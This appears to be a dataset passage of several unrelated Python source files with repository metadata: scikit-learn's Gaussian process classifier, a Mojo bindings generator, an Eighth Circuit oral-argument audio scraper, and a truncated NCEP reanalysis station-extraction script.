C : ndarray of shape (n_samples,)
Predicted target values for X, values are from ``classes_``
"""
check_is_fitted(self)
# As discussed on Section 3.4.2 of GPML, for making hard binary
# decisions, it is enough to compute the MAP of the posterior and
# pass it through the link function
K_star = self.kernel_(self.X_train_, X) # K_star =k(x_star)
f_star = K_star.T.dot(self.y_train_ - self.pi_) # Algorithm 3.2,Line 4
return np.where(f_star > 0, self.classes_[1], self.classes_[0])
def predict_proba(self, X):
"""Return probability estimates for the test vector X.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Query points where the GP is evaluated for classification.
Returns
-------
C : array-like of shape (n_samples, n_classes)
Returns the probability of the samples for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute ``classes_``.
"""
check_is_fitted(self)
# Based on Algorithm 3.2 of GPML
K_star = self.kernel_(self.X_train_, X) # K_star =k(x_star)
f_star = K_star.T.dot(self.y_train_ - self.pi_) # Line 4
v = solve(self.L_, self.W_sr_[:, np.newaxis] * K_star) # Line 5
# Line 6 (compute np.diag(v.T.dot(v)) via einsum)
var_f_star = self.kernel_.diag(X) - np.einsum("ij,ij->j", v, v)
# Line 7:
# Approximate \int log(z) * N(z | f_star, var_f_star)
# Approximation is due to Williams & Barber, "Bayesian Classification
# with Gaussian Processes", Appendix A: Approximate the logistic
# sigmoid by a linear combination of 5 error functions.
# For information on how this integral can be computed see
# blitiri.blogspot.de/2012/11/gaussian-integral-of-error-function.html
alpha = 1 / (2 * var_f_star)
gamma = LAMBDAS * f_star
integrals = (
np.sqrt(np.pi / alpha)
* erf(gamma * np.sqrt(alpha / (alpha + LAMBDAS ** 2)))
/ (2 * np.sqrt(var_f_star * 2 * np.pi))
)
pi_star = (COEFS * integrals).sum(axis=0) + 0.5 * COEFS.sum()
return np.vstack((1 - pi_star, pi_star)).T
def log_marginal_likelihood(
self, theta=None, eval_gradient=False, clone_kernel=True
):
"""Returns log-marginal likelihood of theta for training data.
Parameters
----------
theta : array-like of shape (n_kernel_params,), default=None
Kernel hyperparameters for which the log-marginal likelihood is
evaluated. If None, the precomputed log_marginal_likelihood
of ``self.kernel_.theta`` is returned.
eval_gradient : bool, default=False
If True, the gradient of the log-marginal likelihood with respect
to the kernel hyperparameters at position theta is returned
additionally. If True, theta must not be None.
clone_kernel : bool, default=True
If True, the kernel attribute is copied. If False, the kernel
attribute is modified, but may result in a performance improvement.
Returns
-------
log_likelihood : float
Log-marginal likelihood of theta for training data.
log_likelihood_gradient : ndarray of shape (n_kernel_params,), \
optional
Gradient of the log-marginal likelihood with respect to the kernel
hyperparameters at position theta.
Only returned when `eval_gradient` is True.
"""
if theta is None:
if eval_gradient:
raise ValueError("Gradient can only be evaluated for theta!=None")
return self.log_marginal_likelihood_value_
if clone_kernel:
kernel = self.kernel_.clone_with_theta(theta)
else:
kernel = self.kernel_
kernel.theta = theta
if eval_gradient:
K, K_gradient = kernel(self.X_train_, eval_gradient=True)
else:
K = kernel(self.X_train_)
# Compute log-marginal-likelihood Z and also store some temporaries
# which can be reused for computing Z's gradient
Z, (pi, W_sr, L, b, a) = self._posterior_mode(K, return_temporaries=True)
if not eval_gradient:
return Z
# Compute gradient based on Algorithm 5.1 of GPML
d_Z = np.empty(theta.shape[0])
# XXX: Get rid of the np.diag() in the next line
R = W_sr[:, np.newaxis] * cho_solve((L, True), np.diag(W_sr)) # Line 7
C = solve(L, W_sr[:, np.newaxis] * K) # Line 8
# Line 9: (use einsum to compute np.diag(C.T.dot(C))))
s_2 = (
-0.5
* (np.diag(K) - np.einsum("ij, ij -> j", C, C))
* (pi * (1 - pi) * (1 - 2 * pi))
) # third derivative
for j in range(d_Z.shape[0]):
C = K_gradient[:, :, j] # Line 11
# Line 12: (R.T.ravel().dot(C.ravel()) = np.trace(R.dot(C)))
s_1 = 0.5 * a.T.dot(C).dot(a) - 0.5 * R.T.ravel().dot(C.ravel())
b = C.dot(self.y_train_ - pi) # Line 13
s_3 = b - K.dot(R.dot(b)) # Line 14
d_Z[j] = s_1 + s_2.T.dot(s_3) # Line 15
return Z, d_Z
def _posterior_mode(self, K, return_temporaries=False):
"""Mode-finding for binary Laplace GPC and fixed kernel.
This approximates the posterior of the latent function values for given
inputs and target observations with a Gaussian approximation and uses
Newton's iteration to find the mode of this approximation.
"""
# Based on Algorithm 3.1 of GPML
# If warm_start are enabled, we reuse the last solution for the
# posterior mode as initialization; otherwise, we initialize with 0
if (
self.warm_start
and hasattr(self, "f_cached")
and self.f_cached.shape == self.y_train_.shape
):
f = self.f_cached
else:
f = np.zeros_like(self.y_train_, dtype=np.float64)
# Use Newton's iteration method to find mode of Laplace approximation
log_marginal_likelihood = -np.inf
for _ in range(self.max_iter_predict):
# Line 4
pi = expit(f)
W = pi * (1 - pi)
# Line 5
W_sr = np.sqrt(W)
W_sr_K = W_sr[:, np.newaxis] * K
B = np.eye(W.shape[0]) + W_sr_K * W_sr
L = cholesky(B, lower=True)
# Line 6
b = W * f + (self.y_train_ - pi)
# Line 7
a = b - W_sr * cho_solve((L, True), W_sr_K.dot(b))
# Line 8
f = K.dot(a)
# Line 10: Compute log marginal likelihood in loop and use as
# convergence criterion
lml = (
-0.5 * a.T.dot(f)
- np.log1p(np.exp(-(self.y_train_ * 2 - 1) * f)).sum()
- np.log(np.diag(L)).sum()
)
# Check if we have converged (log marginal likelihood does
# not decrease)
# XXX: more complex convergence criterion
if lml - log_marginal_likelihood < 1e-10:
break
log_marginal_likelihood = lml
self.f_cached = f # Remember solution for later warm-starts
if return_temporaries:
return log_marginal_likelihood, (pi, W_sr, L, b, a)
else:
return log_marginal_likelihood
def _constrained_optimization(self, obj_func, initial_theta, bounds):
if self.optimizer == "fmin_l_bfgs_b":
opt_res = scipy.optimize.minimize(
obj_func, initial_theta, method="L-BFGS-B", jac=True, bounds=bounds
)
_check_optimize_result("lbfgs", opt_res)
theta_opt, func_min = opt_res.x, opt_res.fun
elif callable(self.optimizer):
theta_opt, func_min = self.optimizer(obj_func, initial_theta, bounds=bounds)
else:
raise ValueError("Unknown optimizer %s." % self.optimizer)
return theta_opt, func_min
class GaussianProcessClassifier(ClassifierMixin, BaseEstimator):
"""Gaussian process classification (GPC) based on Laplace approximation.
The implementation is based on Algorithm 3.1, 3.2, and 5.1 of
Gaussian Processes for Machine Learning (GPML) by Rasmussen and
Williams.
Internally, the Laplace approximation is used for approximating the
non-Gaussian posterior by a Gaussian.
Currently, the implementation is restricted to using the logistic link
function. For multi-class classification, several binary one-versus-rest
classifiers are fitted. Note that this class thus does not implement
a true multi-class Laplace approximation.
Read more in the :ref:`User Guide <gaussian_process>`.
Parameters
----------
kernel : kernel instance, default=None
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that
the kernel's hyperparameters are optimized during fitting.
optimizer : 'fmin_l_bfgs_b' or callable, default='fmin_l_bfgs_b'
Can either be one of the internally supported optimizers for optimizing
the kernel's parameters, specified by a string, or an externally
defined optimizer passed as a callable. If a callable is passed, it
must have the signature::
def optimizer(obj_func, initial_theta, bounds):
# * 'obj_func' is the objective function to be maximized, which
# takes the hyperparameters theta as parameter and an
# optional flag eval_gradient, which determines if the
# gradient is returned additionally to the function value
# * 'initial_theta': the initial value for theta, which can be
# used by local optimizers
# * 'bounds': the bounds on the values of theta
....
# Returned are the best found hyperparameters theta and
# the corresponding value of the target function.
return theta_opt, func_min
By default, the 'L-BFGS-B' algorithm from scipy.optimize.minimize
is used. If None is passed, the kernel's parameters are kept fixed.
Available internal optimizers are::
'fmin_l_bfgs_b'
n_restarts_optimizer : int, default=0
The number of restarts of the optimizer for finding the kernel's
parameters which maximize the log-marginal likelihood. The first run
of the optimizer is performed from the kernel's initial parameters,
the remaining ones (if any) from thetas sampled log-uniform randomly
from the space of allowed theta-values. If greater than 0, all bounds
must be finite. Note that n_restarts_optimizer=0 implies that one
run is performed.
max_iter_predict : int, default=100
The maximum number of iterations in Newton's method for approximating
the posterior during predict. Smaller values will reduce computation
time at the cost of worse results.
warm_start : bool, default=False
If warm-starts are enabled, the solution of the last Newton iteration
on the Laplace approximation of the posterior mode is used as
initialization for the next call of _posterior_mode(). This can speed
up convergence when _posterior_mode is called several times on similar
problems as in hyperparameter optimization. See :term:`the Glossary
<warm_start>`.
copy_X_train : bool, default=True
If True, a persistent copy of the training data is stored in the
object. Otherwise, just a reference to the training data is stored,
which might cause predictions to change if the data is modified
externally.
random_state : int, RandomState instance or None, default=None
Determines random number generation used to initialize the centers.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
multi_class : {'one_vs_rest', 'one_vs_one'}, default='one_vs_rest'
Specifies how multi-class classification problems are handled.
Supported are 'one_vs_rest' and 'one_vs_one'. In 'one_vs_rest',
one binary Gaussian process classifier is fitted for each class, which
is trained to separate this class from the rest. In 'one_vs_one', one
binary Gaussian process classifier is fitted for each pair of classes,
which is trained to separate these two classes. The predictions of
these binary predictors are combined into multi-class predictions.
Note that 'one_vs_one' does not support predicting probability
estimates.
n_jobs : int, default=None
The number of jobs to use for the computation: the specified
multiclass problems are computed in parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
base_estimator_ : ``Estimator`` instance
The estimator instance that defines the likelihood function
using the observed data.
kernel_ : kernel instance
The kernel used for prediction. In case of binary classification,
the structure of the kernel is the same as the one passed as parameter
but with optimized hyperparameters. In case of multi-class
classification, a CompoundKernel is returned which consists of the
different kernels used in the one-versus-rest classifiers.
log_marginal_likelihood_value_ : float
The log-marginal-likelihood of ``self.kernel_.theta``
classes_ : array-like of shape (n_classes,)
Unique class labels.
n_classes_ : int
The number of classes in the training data
n_features_in_ : int
Number of features seen during :term:`fit`.
.. versionadded:: 0.24
See Also
--------
GaussianProcessRegressor : Gaussian process regression (GPR).
Examples
--------
>>> from sklearn.datasets import load_iris
>>> from sklearn.gaussian_process import GaussianProcessClassifier
>>> from sklearn.gaussian_process.kernels import RBF
>>> X, y = load_iris(return_X_y=True)
>>> kernel = 1.0 * RBF(1.0)
>>> gpc = GaussianProcessClassifier(kernel=kernel,
... random_state=0).fit(X, y)
>>> gpc.score(X, y)
0.9866...
>>> gpc.predict_proba(X[:2,:])
array([[0.83548752, 0.03228706, 0.13222543],
[0.79064206, 0.06525643, 0.14410151]])
.. versionadded:: 0.18
"""
def __init__(
self,
kernel=None,
*,
optimizer="fmin_l_bfgs_b",
n_restarts_optimizer=0,
max_iter_predict=100,
warm_start=False,
copy_X_train=True,
random_state=None,
multi_class="one_vs_rest",
n_jobs=None,
):
self.kernel = kernel
self.optimizer = optimizer
self.n_restarts_optimizer = n_restarts_optimizer
self.max_iter_predict = max_iter_predict
self.warm_start = warm_start
self.copy_X_train = copy_X_train
self.random_state = random_state
self.multi_class = multi_class
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit Gaussian process classification model.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Feature vectors or other representations of training data.
y : array-like of shape (n_samples,)
Target values.
Returns
-------
self : object
Returns an instance of self.
"""
if self.kernel is None or self.kernel.requires_vector_input:
X, y = self._validate_data(
X, y, multi_output=False, ensure_2d=True, dtype="numeric"
)
else:
X, y = self._validate_data(
X, y, multi_output=False, ensure_2d=False, dtype=None
)
self.base_estimator_ = _BinaryGaussianProcessClassifierLaplace(
kernel=self.kernel,
optimizer=self.optimizer,
n_restarts_optimizer=self.n_restarts_optimizer,
max_iter_predict=self.max_iter_predict,
warm_start=self.warm_start,
copy_X_train=self.copy_X_train,
random_state=self.random_state,
)
self.classes_ = np.unique(y)
self.n_classes_ = self.classes_.size
if self.n_classes_ == 1:
raise ValueError(
"GaussianProcessClassifier requires 2 or more "
"distinct classes; got %d class (only class %s "
"is present)" % (self.n_classes_, self.classes_[0])
)
if self.n_classes_ > 2:
if self.multi_class == "one_vs_rest":
self.base_estimator_ = OneVsRestClassifier(
self.base_estimator_, n_jobs=self.n_jobs
)
elif self.multi_class == "one_vs_one":
self.base_estimator_ = OneVsOneClassifier(
self.base_estimator_, n_jobs=self.n_jobs
)
else:
raise ValueError("Unknown multi-class mode %s" % self.multi_class)
self.base_estimator_.fit(X, y)
if self.n_classes_ > 2:
self.log_marginal_likelihood_value_ = np.mean(
[
estimator.log_marginal_likelihood()
for estimator in self.base_estimator_.estimators_
]
)
else:
self.log_marginal_likelihood_value_ = (
self.base_estimator_.log_marginal_likelihood()
)
return self
def predict(self, X):
"""Perform classification on an array of test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Query points where the GP is evaluated for classification.
Returns
-------
C : ndarray of shape (n_samples,)
Predicted target values for X, values are from ``classes_``.
"""
check_is_fitted(self)
if self.kernel is None or self.kernel.requires_vector_input:
X = self._validate_data(X, ensure_2d=True, dtype="numeric", reset=False)
else:
X = self._validate_data(X, ensure_2d=False, dtype=None, reset=False)
return self.base_estimator_.predict(X)
def predict_proba(self, X):
"""Return probability estimates for the test vector X.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Query points where the GP is evaluated for classification.
Returns
-------
C : array-like of shape (n_samples, n_classes)
Returns the probability of the samples for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute :term:`classes_`.
"""
check_is_fitted(self)
if self.n_classes_ > 2 and self.multi_class == "one_vs_one":
raise ValueError(
"one_vs_one multi-class mode does not support "
"predicting probability estimates. Use "
"one_vs_rest mode instead."
)
if self.kernel is None or self.kernel.requires_vector_input:
X = self._validate_data(X, ensure_2d=True, dtype="numeric", reset=False)
else:
X = self._validate_data(X, ensure_2d=False, dtype=None, reset=False)
return self.base_estimator_.predict_proba(X)
@property
def kernel_(self):
"""Return the kernel of the base estimator."""
if self.n_classes_ == 2:
return self.base_estimator_.kernel_
else:
return CompoundKernel(
[estimator.kernel_ for estimator in self.base_estimator_.estimators_]
)
def log_marginal_likelihood(
self, theta=None, eval_gradient=False, clone_kernel=True
):
"""Return log-marginal likelihood of theta for training data.
In the case of multi-class classification, the mean log-marginal
likelihood of the one-versus-rest classifiers are returned.
Parameters
----------
theta : array-like of shape (n_kernel_params,), default=None
Kernel hyperparameters for which the log-marginal likelihood is
evaluated. In the case of multi-class classification, theta may
be the hyperparameters of the compound kernel or of an individual
kernel. In the latter case, all individual kernel get assigned the
same theta values. If None, the precomputed log_marginal_likelihood
of ``self.kernel_.theta`` is returned.
eval_gradient : bool, default=False
If True, the gradient of the log-marginal likelihood with respect
to the kernel hyperparameters at position theta is returned
additionally. Note that gradient computation is not supported
for non-binary classification. If True, theta must not be None.
clone_kernel : bool, default=True
If True, the kernel attribute is copied. If False, the kernel
attribute is modified, but may result in a performance improvement.
Returns
-------
log_likelihood : float
Log-marginal likelihood of theta for training data.
log_likelihood_gradient : ndarray of shape (n_kernel_params,), optional
Gradient of the log-marginal likelihood with respect to the kernel
hyperparameters at position theta.
Only returned when `eval_gradient` is True.
"""
check_is_fitted(self)
if theta is None:
if eval_gradient:
raise ValueError("Gradient can only be evaluated for theta!=None")
return self.log_marginal_likelihood_value_
theta = np.asarray(theta)
if self.n_classes_ == 2:
return self.base_estimator_.log_marginal_likelihood(
theta, eval_gradient, clone_kernel=clone_kernel
)
else:
if eval_gradient:
raise NotImplementedError(
"Gradient of log-marginal-likelihood not implemented for "
"multi-class GPC."
)
estimators = self.base_estimator_.estimators_
n_dims = estimators[0].kernel_.n_dims
if theta.shape[0] == n_dims: # use same theta for all sub-kernels
return np.mean(
[
estimator.log_marginal_likelihood(
theta, clone_kernel=clone_kernel
)
for i, estimator in enumerate(estimators)
]
)
elif theta.shape[0] == n_dims * self.classes_.shape[0]:
# theta for compound kernel
return np.mean(
[
estimator.log_marginal_likelihood(
theta[n_dims * i : n_dims * (i + 1)],
clone_kernel=clone_kernel,
)
for i, estimator in enumerate(estimators)
]
)
else:
raise ValueError(
"Shape of theta must be either %d or %d. "
"Obtained theta with shape %d."
% (n_dims, n_dims * self.classes_.shape[0], theta.shape[0])
)
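As a usage note for the `optimizer` parameter documented above, here is a sketch of a callable matching the required signature; it simply mirrors the built-in 'fmin_l_bfgs_b' path and assumes scipy is available:
import scipy.optimize

def my_optimizer(obj_func, initial_theta, bounds):
    # obj_func returns the negated log-marginal likelihood and its gradient,
    # so jac=True lets the minimizer consume both from a single call.
    res = scipy.optimize.minimize(
        obj_func, initial_theta, method="L-BFGS-B", jac=True, bounds=bounds
    )
    return res.x, res.fun

# gpc = GaussianProcessClassifier(kernel=1.0 * RBF(1.0), optimizer=my_optimizer)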
|
shyamalschandra/scikit-learn
|
sklearn/gaussian_process/_gpc.py
|
Python
|
bsd-3-clause
| 35,129
|
[
"Gaussian"
] |
7b21ec5046d4f0d483c242e6f9db84f001a9c710c7f33502b697e2990ad1ece0
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The frontend for the Mojo bindings system."""
import argparse
import imp
import os
import pprint
import sys
script_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(script_dir, "pylib"))
from generate import mojom_data
from parse import mojo_parser
from parse import mojo_translate
def LoadGenerators(generators_string):
if not generators_string:
return [] # No generators.
generators = []
for generator_name in [s.strip() for s in generators_string.split(",")]:
# "Built-in" generators:
if generator_name.lower() == "c++":
generator_name = os.path.join(script_dir, "generators",
"mojom_cpp_generator.py")
elif generator_name.lower() == "javascript":
generator_name = os.path.join(script_dir, "generators",
"mojom_js_generator.py")
# Specified generator python module:
elif generator_name.endswith(".py"):
pass
else:
print "Unknown generator name %s" % generator_name
sys.exit(1)
generator_module = imp.load_source(os.path.basename(generator_name)[:-3],
generator_name)
generators.append(generator_module)
return generators
def ProcessFile(args, generator_modules, filename, processed_files):
# Ensure we only visit each file once.
if filename in processed_files:
if processed_files[filename] is None:
raise Exception("Circular dependency: " + filename)
return processed_files[filename]
processed_files[filename] = None
dirname, name = os.path.split(filename)
# TODO(darin): There's clearly too many layers of translation here! We can
# at least avoid generating the serialized Mojom IR.
tree = mojo_parser.Parse(filename)
mojom = mojo_translate.Translate(tree, name)
if args.debug_print_intermediate:
pprint.PrettyPrinter().pprint(mojom)
# Process all our imports first and collect the module object for each.
# We use these to generate proper type info.
for import_data in mojom['imports']:
import_filename = os.path.join(dirname, import_data['filename'])
import_data['module'] = ProcessFile(
args, generator_modules, import_filename, processed_files)
module = mojom_data.OrderedModuleFromData(mojom)
# Set the path as relative to the source root.
module.path = os.path.relpath(os.path.abspath(filename),
os.path.abspath(args.depth))
# Normalize to unix-style path here to keep the generators simpler.
module.path = module.path.replace('\\', '/')
for generator_module in generator_modules:
generator = generator_module.Generator(module, args.output_dir)
generator.GenerateFiles()
processed_files[filename] = module
return module
def Main():
parser = argparse.ArgumentParser(
description="Generate bindings from mojom files.")
parser.add_argument("filename", nargs="+",
help="mojom input file")
parser.add_argument("-d", "--depth", dest="depth", default=".",
help="depth from source root")
parser.add_argument("-o", "--output_dir", dest="output_dir", default=".",
help="output directory for generated files")
parser.add_argument("-g", "--generators", dest="generators_string",
metavar="GENERATORS", default="c++,javascript",
help="comma-separated list of generators")
parser.add_argument("--debug_print_intermediate", action="store_true",
help="print the intermediate representation")
args = parser.parse_args()
generator_modules = LoadGenerators(args.generators_string)
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
for filename in args.filename:
ProcessFile(args, generator_modules, filename, {})
return 0
if __name__ == "__main__":
sys.exit(Main())
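The in-progress sentinel in ProcessFile (storing None for a file before recursing into its imports) is a compact way to detect circular dependencies. A standalone sketch of the same idea, with illustrative names:

# Mark a node as "in progress" (None) before recursing, and treat a revisit
# of an in-progress node as a circular dependency.
def resolve(node, deps, resolved=None):
    if resolved is None:
        resolved = {}
    if node in resolved:
        if resolved[node] is None:
            raise Exception("Circular dependency: " + node)
        return resolved[node]
    resolved[node] = None  # in progress
    for dep in deps.get(node, []):
        resolve(dep, deps, resolved)
    resolved[node] = node  # done; a real pipeline would store the built module
    return resolved[node]

resolve("a", {"a": ["b"], "b": []})       # fine
# resolve("a", {"a": ["b"], "b": ["a"]})  # raises: Circular dependency: a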
|
anirudhSK/chromium
|
mojo/public/bindings/mojom_bindings_generator.py
|
Python
|
bsd-3-clause
| 4,091
|
[
"VisIt"
] |
22451d564fca7ab3d0ac36305095b234eaf345299fc379c801c5e58905572bb0
|
"""Oral Argument Audio Scraper for Eighth Circuit Court of Appeals
CourtID: ca8
Court Short Name: 8th Cir.
Author: Brian W. Carver
Date created: 2014-06-21
History:
- 2014-07-22: download_url fixed by mlr
"""
from datetime import datetime
from juriscraper.OralArgumentSite import OralArgumentSite
class Site(OralArgumentSite):
def __init__(self, *args, **kwargs):
super(Site, self).__init__(*args, **kwargs)
self.court_id = self.__module__
self.url = 'http://media-oa.ca8.uscourts.gov/circ8rss.xml'
def _download(self, request_dict={}):
"""Go through the items and filter out ones that aren't complete.
"""
self.items = []
html_tree = super(Site, self)._download(request_dict=request_dict)
for item in html_tree.xpath('//item'):
case_name = item.xpath('./title/text()')[0].split(":", 1)[1]
if case_name.strip():
self.items.append(item)
# Set self.html to None so it can't be misused.
return None
def _get_download_urls(self):
return [item.xpath('./enclosure/@url')[0] for item in self.items]
def _get_case_names(self):
case_names = []
for txt in [item.xpath('./title/text()')[0] for item in self.items]:
case_name = txt.split(': ', 1)[1]
case_names.append(case_name)
return case_names
def _get_case_dates(self):
case_dates = []
for txt in [item.xpath('./description/text()')[0] for item in self.items]:
# I can't see it, but there's apparently whitespace or a newline
# at the end of these dates that has to be removed or we error out.
case_date = txt.split('about ', 1)[1].strip()
case_dates.append(datetime.strptime(case_date, '%m/%d/%Y').date())
return case_dates
def _get_docket_numbers(self):
docket_numbers = []
for txt in [item.xpath('./title/text()')[0] for item in self.items]:
docket_number = txt.split(': ', 1)[0]
docket_numbers.append(docket_number)
return docket_numbers
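Note that the download-URL XPath must be relative: in lxml, an expression starting with '//' is evaluated from the document root even when called on a subelement, so every item would yield the first enclosure in the feed. A self-contained sketch (illustrative feed, assuming lxml is installed):

from lxml import etree

feed = etree.fromstring(
    b"<rss><item><enclosure url='a.mp3'/></item>"
    b"<item><enclosure url='b.mp3'/></item></rss>"
)
items = feed.xpath('//item')
print([i.xpath('//enclosure/@url')[0] for i in items])  # ['a.mp3', 'a.mp3']
print([i.xpath('./enclosure/@url')[0] for i in items])  # ['a.mp3', 'b.mp3']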
|
Andr3iC/juriscraper
|
oral_args/united_states/federal_appellate/ca8.py
|
Python
|
bsd-2-clause
| 2,115
|
[
"Brian"
] |
f586af308ededdbdae13ed25fb26cb629be5b107192ce45c7033086d4a833a4a
|
#!/usr/bin/env
"""
NCEP_WindsSFCtemp_Station.py
Retrieve NCEP/NCAR reanalysis 10 m winds and 2 m air temperature for a defined station:
Save in EPIC NetCDF standard
Modified 2016-12-06: Use sbell unified package subroutines for netcdf/time - cleanup code
"""
#System Stack
import datetime
import sys
import argparse
#Science Stack
import numpy as np
from netCDF4 import Dataset
# Visual Stack
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, shiftgrid
# User Stack
from calc import haversine as sphered
from io_utils.EcoFOCI_netCDF_read import EcoFOCI_netCDF
from calc.EPIC2Datetime import EPIC2Datetime, to_UDUNITS, Datetime2EPIC
from utilities import ncutilities as ncutil
__author__ = 'Shaun Bell'
__email__ = 'shaun.bell@noaa.gov'
__created__ = datetime.datetime(2014, 01, 13)
__modified__ = datetime.datetime(2014, 01, 13)
__version__ = "0.1.0"
__status__ = "Development"
__keywords__ = 'NCEP','Unimak', 'Shumagin','3hr filtered', 'U,V','Winds', 'Gulf of Alaska'
"""------------------------EPIC Write Modules-------------------------------------------"""
def write2epic( file_name, stationid, time, lat_lon, data ):
ncinstance = ncutil.EPIC_NC(savefile=file_name)
ncinstance.file_create()
ncinstance.sbeglobal_atts(DATA_CMNT='NCEP NCAR Reanalysis')
ncinstance.PMELglobal_atts(Station_Name=stationid, file_name=( __file__.split('/')[-1]) )
ncinstance.dimension_init(len_time=len(time[0]))
ncinstance.variable_init()
ncinstance.add_coord_data(time1=time[0], time2=time[1], latitude=lat_lon[0], longitude=-1 * lat_lon[1], \
depth_level=0. )
ncinstance.add_data('WU_422', data[0])
ncinstance.add_data('WV_423', data[1])
ncinstance.add_data('AT_21', data[2])
ncinstance.close()
def write2epic_cf( file_name, stationid, time, lat_lon, data ):
ncinstance = ncutil.EPIC_NC_cf(savefile=file_name)
ncinstance.file_create()
ncinstance.sbeglobal_atts(DATA_CMNT='NCEP NCAR Reanalysis')
ncinstance.PMELglobal_atts(Station_Name=stationid, file_name=( __file__.split('/')[-1]) )
ncinstance.dimension_init(len_time=len(time))
ncinstance.variable_init()
ncinstance.add_coord_data(time=time, latitude=lat_lon[0], longitude=-1 * lat_lon[1], \
depth_level=0. )
ncinstance.add_data('WU_422', data[0])
ncinstance.add_data('WV_423', data[1])
ncinstance.add_data('AT_21', data[2])
ncinstance.close()
"""------------------------- Topo Modules -------------------------------------------"""
def etopo5_data():
""" read in etopo5 topography/bathymetry. """
file = '/Users/bell/in_and_outbox/Ongoing_Analysis/MapGrids/etopo5.nc'
etopodata = Dataset(file)
topoin = etopodata.variables['bath'][:]
lons = etopodata.variables['X'][:]
lats = etopodata.variables['Y'][:]
etopodata.close()
topoin,lons = shiftgrid(0.,topoin,lons,start=False) # -360 -> 0
lons, lats = np.meshgrid(lons, lats)
return(topoin, lats, lons)
"""------------------------- Main Modules -------------------------------------------"""
parser = argparse.ArgumentParser(description='NCEPHROISST from Single Station')
parser.add_argument('MooringID', metavar='MooringID', type=str, help='MooringID Name')
parser.add_argument('latitude', metavar='latitude', type=float, help='latitude (+N)')
parser.add_argument('longitude', metavar='longitude', type=float, help='longitude (+W)')
parser.add_argument('years', nargs='+', type=int, help='start and stop year')
parser.add_argument('--DataPath', metavar='DataPath', type=str, help='full path to alternate file')
parser.add_argument("-scf",'--store_cf', action="store_true", help='cf conventions - primarily in time')
parser.add_argument("-sep",'--store_epic', action="store_true", help='epic conventions - primarily in time')
parser.add_argument("-plot",'--plot', action="store_true", help='create plot of location')
args = parser.parse_args()
####### CMD Line Parse
### CMD Line User defined Station parameters
station_name = [args.MooringID]
sta_lat = [args.latitude]
sta_long = [args.longitude]
### Hard coded path
if args.DataPath:
NCEP = args.DataPath
else:
NCEP = '/Users/bell/Data_Local/Reanalysis_Files/NCEP-NCAR/daily/'
infile = [NCEP + 'uwnd.10m.gauss.2019.nc']
print infile
#################
### Grab grid points for future slicing
# - assume grid is same in all model output
df = EcoFOCI_netCDF(infile[0])
vars_dic = df.get_vars()
nchandle = df._getnchandle_()
lat_lon = {}
for j, v in enumerate(['lat', 'lon']):
lat_lon[v] = nchandle.variables[v][:]
df.close()
### Find model points
#Find NCEP nearest point to moorings - haversine formula
# NCEP data is 0->360 (positive east), Moorings are usually expressed +W for FOCI
stn1_pt = sphered.nearest_point([sta_lat[0],-1 * sta_long[0]],lat_lon['lat'],lat_lon['lon'], '1d')
stn1_modelpt = [lat_lon['lat'][stn1_pt[3]],lat_lon['lon'][stn1_pt[4]]]
print "stn1 nearest point to {sta_lat}, {sta_lon} which is lat:{sta_modellat} , lon:{sta_modellon}".format(
sta_lat=sta_lat[0], sta_lon=sta_long[0],
sta_modellat=stn1_modelpt[0], sta_modellon=stn1_modelpt[1])
stn1_modelpt[1] = -1.*((180 - stn1_modelpt[1]) + 180)
print "thus converting lon to degrees W negative {sta_modellon}".format(sta_modellon=stn1_modelpt[1])
#loop over all requested data
years = range(args.years[0],args.years[1]+1)
for yy in years:
# retrieve only these location's data
### uwnd files
infile = NCEP + 'uwnd.10m.gauss.'+ str(yy) + '.nc'
print "Working on file " + infile
df = EcoFOCI_netCDF(infile)
vars_dic = df.get_vars()
nchandle = df._getnchandle_()
print "Parameters availabile: {params}".format(params=vars_dic.keys())
stn1_data = {}
for j, v in enumerate(vars_dic):
try: #check for nc variable
stn1_data[v] = nchandle.variables[v][:,stn1_pt[3], stn1_pt[4]]
except ValueError: #if parameter is not of expected dimensions
stn1_data[v] = nchandle.variables[v][:]
stn1_uwnd = stn1_data['uwnd']
df.close()
### vwind files
infile = NCEP + 'vwnd.10m.gauss.'+ str(yy) + '.nc'
print "Working on file " + infile
df = EcoFOCI_netCDF(infile)
vars_dic = df.get_vars()
nchandle = df._getnchandle_()
print "Parameters availabile: {params}".format(params=vars_dic.keys())
stn1_data = {}
for j, v in enumerate(vars_dic):
try: #check for nc variable
stn1_data[v] = nchandle.variables[v][:,stn1_pt[3], stn1_pt[4]]
except ValueError: #if parameter is not of expected dimensions
stn1_data[v] = nchandle.variables[v][:]
stn1_vwind = stn1_data['vwnd']
df.close()
### air files
infile = NCEP + 'air.2m.gauss.'+ str(yy) + '.nc'
print "Working on file " + infile
df = EcoFOCI_netCDF(infile)
vars_dic = df.get_vars()
nchandle = df._getnchandle_()
print "Parameters availabile: {params}".format(params=vars_dic.keys())
stn1_data = {}
for j, v in enumerate(vars_dic):
try: #check for nc variable
stn1_data[v] = nchandle.variables[v][:,stn1_pt[3], stn1_pt[4]]
except ValueError: #if parameter is not of expected dimensions
stn1_data[v] = nchandle.variables[v][:]
stn1_2mair = stn1_data['air'] - 273.15
df.close()
#convert to EPIC time
pydate = to_UDUNITS(stn1_data['time'],
time_since_str='hours since 1800-01-01 00:00:00')
epic_time, epic_time1 = Datetime2EPIC(pydate.tolist())
if args.store_epic:
# write to NetCDF
outfile = 'data/NCEPNCAR_' + args.MooringID + '_' + str(yy) + '.nc'
print "Writing to Epic NetCDF " + outfile
write2epic( outfile, station_name[0], [epic_time, epic_time1], stn1_modelpt, [stn1_uwnd,stn1_vwind,stn1_2mair])
if args.store_cf:
